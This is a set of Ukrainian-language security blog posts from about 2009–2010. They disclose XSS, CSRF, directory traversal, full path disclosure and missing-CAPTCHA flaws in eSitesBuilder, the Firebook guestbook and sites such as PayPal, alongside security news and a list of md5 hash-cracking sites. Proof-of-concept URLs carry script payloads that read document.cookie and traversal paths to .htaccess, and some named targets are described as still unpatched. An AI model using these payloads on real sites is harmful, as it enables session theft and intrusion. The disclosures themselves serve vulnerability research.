Websecurity - Веб безпека

Іноді я зустрічаю сайти, де одна і та сама уразливість має місце на всьому сайті, на кожній його сторінці. Це можуть бути як SQL Injection чи Cross-Site Scripting, так й інші уразливості. Тобто сайт представляє собою сито з дірок.

Подібні випадки можуть мати місце з наступних основних причин:

1. На сайті є уразливий код, що включений до багатьох або усіх сторінок сайта.

2. На сайті включений зовнішній код (наприклад, JavaScript код зовнішнього додатку), що розміщений на багатьох або усіх сторінках сайта.

3. На сайті не зроблені видповіді налаштування (або на сайті вцілому, або в кожному скрипті зокрема), що призводить до появи дірок на багатьох або усіх сторінках сайта (наприклад, Full path disclosure уразливостей).

Розглянемо приклади подібних випадків.

Серед випадків, що відносяться до першої причини, є наступні. В 2006 році я виявив численні SQLi та XSS уразливості на www.daily.com.ua, що мали місце майже на кожній сторінці сайта.

В 2007 році я виявив численні XSS уразливості на www.moskva.com, що мали місце майже на всіх сторінках сайта. А в 2009 році я виявив численні XSS уразливості на www.yuniti.com, що мають місце на всіх сторінках сайта (і досі не виправлені).

Серед випадків, що відносяться до другої причини, є наступні. В 2006 році я виявив XSS уразливість в коді однієї банерної системи, що використовувалася на багатьох сайтах. І відповідно на всі сайти, що містили код даної системи, можна було провести XSS атаки (на всіх користувачів даних сайтів).

Також в 2006 році я виявив уразливості в Яндекс-Директ - в JS-коді системи Яндекс-Директ. Які я виявив на одному сайті, що розміщував контекстну-рекламу даної системи (і кожна сторінка, що містила даний код, мала XSS уразливості). І відповідно всі сайти, що використовували Яндекс-Директ і самі не докладали зусиль по убезпеченню від XSS атак, можли бути атаковані (всі користувачі даних сайтів). А в 2007 році я виявив на одному сайті уразливість в коді Google Analytics.

Серед випадків, що відносяться до третьої причини, є наступні. В PHP додатках, якщо не відключене виведення повідомлень про помилки (на сайті чи в кожному скрипті), у випадках, коли має місце помилка, виводиться повідомлення про помилку, при цьому вказуючи повний шлях на сервері (тобто це Full path disclosure уразливість). І в тих випадках, коли проблема стосується всіх php-скриптів на сайті (наприклад, сталися проблеми з якимось важливим файлом, або змінилися права на сервері, або інші проблеми на сервері), то у всіх php-скриптах буде FPD уразливість.

Численні подібні випадки можна побачити з серії моїх статей про “Warning” Google хакінг. Або на взломаних сайтах, коли були внесені некоректні зміни в один файл (зокрема, файл конфігурації), що включається в усі скрипти на сайті, і тому на кожній сторінці сайта має місце FPD уразливість.

19.11.2009

У березні, 31.03.2009, я знайшов численні Cross-Site Scripting уразливості на проекті http://www.yuniti.com. Тому самому, який першим запронував 3D-капчу. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

19.06.2010

XSS:

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• цікавий
• html включення

На сайті XSS дірки можуть бути на кожній сторінці (використовуючи вищенаведений шаблон).

Дані уразливості досі не виправлені.

В 2007-2008 роках я виявив уразливості на сайті онлайн магазину www.rozetka.com.ua (а пізніше деякі з цих уразливостей я виявив і на іншому сайті на даному движку), про що вже писав в новинах. І як я сьогодні виявив, коли знайшов приховану адмінку, даний движок для онлайн магазинів - це eSitesBuilder. І відповідно дані Cross-Site Scripting та Insufficient Anti-automation уразливості мають місце в eSitesBuilder (це українська комерційна CMS). Про що найближчим часом повідомлю розробникам.

XSS:

http://site/index.php?page=search&search_text=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/index.php?page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/forget.php?e_mail=%3Cscript%3Ealert(document.cookie)%3C/script%3E&seenform=y

Insufficient Anti-automation:

http://site/register.php

http://site/ru/contacts/index.html

В формі реєстрації та формі контактів немає захисту від автоматизованих запитів (капчі).

Уразливі потенційно всі версії eSitesBuilder.

Пропоную вашій увазі добірку цікавих новин на тему безпеки.

За повідомленням hackzona.com.ua, в Архангельській області будуть судити хакера за злом сайтів держустанов. Міжрайонним прокурором міста Котласа (Архангельська область) затверджено обвинувальний висновок у кримінальній справі відносно 21-річного Сергія Дашкаєва, який звинувачується у скоєнні злочинів, передбачених ч. 1 ст. 272 КК РФ (неправомірний доступ до охоронюваної законом комп’ютерної інформації).

Встановлено, що Дашкаєв з серпня 2009 по березень 2010 року здійснював взлом офіційних сайтів державних і муніципальних установ та органів, підприємств і організацій, копіював з них інформацію, а також без згоди правовласників вносив в структуру сайтів зміни.

За повідомленням www.bfm.ru, жертвами кібершахраїв з США сталі жителі 60 країн. У США заочно пред’явлені обвинувачення трьом фігурантам справи в кібершахрайстві, що обдурили користувачів на 100 мільйонів доларів. Жертвами зловмисників стали громадяни більш 60 держав, повідомляє управління ФБР по Чикаго.

За версією слідства, обвинувачувані створили компанію Innovative Marketing. Вона була зареєстрована в африканській державі Беліз як продавець антивірусного й іншого програмного забезпечення. “Дочка” Innovative Marketing знаходилася в Києві, вона і була головним офісом компанії. В києвському офісі й створювалися підроблені антивіруси.

За повідомленням hackzona.com.ua, у продажу є “невиявляємі боти”. Лабораторія PandaLabs виявила мережу, в якій продаються боти, що спеціалізуються на соціальних мережах і системах електронної пошти.

На загальнодоступній веб-сторінці викладено докладний каталог програм, націлених на сервіси електронної пошти та соціальні мережі, включаючи Twitter, Facebook, Hi5, MySpace, MyYearBook, YouTube, Tuenti, Friendster, Gmail і Yahoo.

Продовжу розповідати вам про сайти для пошуку md5 хешей.

В Інтернеті існують веб сайти для пошуку md5 хешей (як й інших хешей). Тобто вони призначені для взлому md5 хешей, щоб по хешу отримати його значення (у випадку хеша пароля, це дозволить отримати пароль).

До раніше наведених сайтів зверну вашу увагу на наступні:

• http://www.md5this.com/list.php
• http://www.rmd5.com
• http://passcracking.ru (MD5, SHA1 і MySQL хеші)
• http://hashcrack.com (MD5, SHA1, MySQL, NTLM і LanMan хеші)
• http://gdataonline.com

В подальшому я продовжу наводити перелік подібних сайтів.

В даній добірці уразливості в веб додатках:

• Multiple Vulnerabilities in Cisco Wireless LAN Controllers (деталі)
• justVisual 2.0 (index.php) <= LFI Vulnerability (деталі)
• Addonics NAS Adapter FTP Remote Denial of Service (деталі)
• Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth) (деталі)
• Multiple Vulnerabilities in CMS faethon (деталі)
• Memcached and MemcacheDB ASLR Bypass Weakness (деталі)
• Multiple XSS vulnerabilities in OSSIM 2.2.1 (деталі)
• SQL Injection Vulnerabilitie in PhotoPost vBGallery 2.5 (деталі)
• XSS vulnerability in easy page cms (деталі)
• Joomla Component com_xmap Sql Injection Vulnerability (деталі)

У листопаді, 13.11.2009, я знайшов Insufficient Anti-automation уразливості на http://www.paypal.com - cайті відомої електронної платіжної системи PayPal. Хоча PayPal і заявляє про те, що слідкує за безпекою власних сайтів, але на необхідність захисту від Insufficient Anti-automation вони зовсів не звернули уваги.

Стосовно сайтів електронних платіжних систем останній раз я писав про уразливість на webmoney.ru.

Insufficient Anti-automation:

https://www.paypal.com/cgi-bin/webscr?cmd=_registration-run
https://www.paypal.com/ewf/f=pps_spf

Форми реєстрації та контакту не мають захисту від автоматизованих запитів (капчі). І хоча при реєстрації для деяких країн PayPal може вимагати SMS-валідацію (що може стати захистом від автоматизованих атак, але лише для деяких країн), то у випадку контактної форми жодних обмежень немає.

В презентації Cross Site Scripting Attacks: Xss Exploits And Defense, що була три роки тому розміщена на www.slideshare.net, розміщена однойменна книга, яка вийшла в 2007 році.

Книга Cross Site Scripting Attacks: Xss Exploits and Defense, про яку я вже писав - це перша книга про XSS уразливості. Що була написана групою авторів: Jeremiah Grossman, Robert Hansen, Petko D. Petkov, Anton Rager та Seth Fogie. І з якою ви можете ознайомитися в онлайні.

Виявлена можливість обходу захисту в Perl.

Уразливі версії: Perl 5.10.

Обхід захисту в Safe.pm.

• Vulnerabilities in Perl (деталі)

13.04.2010

У вересні, 27.09.2009, я знайшов Cross-Site Request Forgery, Cross-Site Scripting, Directory Traversal та Full path disclosure уразливості в Firebook. Це гостьова книга. Дані уразливості я виявив на сайті exwp.com. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатка.

17.06.2010

CSRF:

http://site/path_to_firebook_admin/?URLproxy=http://site;

Можливі CSRF та DoS атаки на інші сайти.

XSS:

http://site/path_to_firebook_admin/?URLproxy=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/guestbook/index.html?answer=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/guestbook/index.html?answer=guestbook/guest/file.html;page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Приклад XSS на http://firebook.ru.

XSS:

• alert(document.cookie)
• цікавий
• html включення

Directory Traversal:

http://site/path_to_firebook_admin/?param=1;show=../.htaccess;
http://site/guestbook/index.html?answer=guestbook/guest/%2E%2E/index.html

Full path disclosure:

http://site/path_to_firebook_admin/?param=1;show=param.txt;

http://site/guestbook/index.html?answer=guestbook/guest/1

Уразливі всі версії Firebook.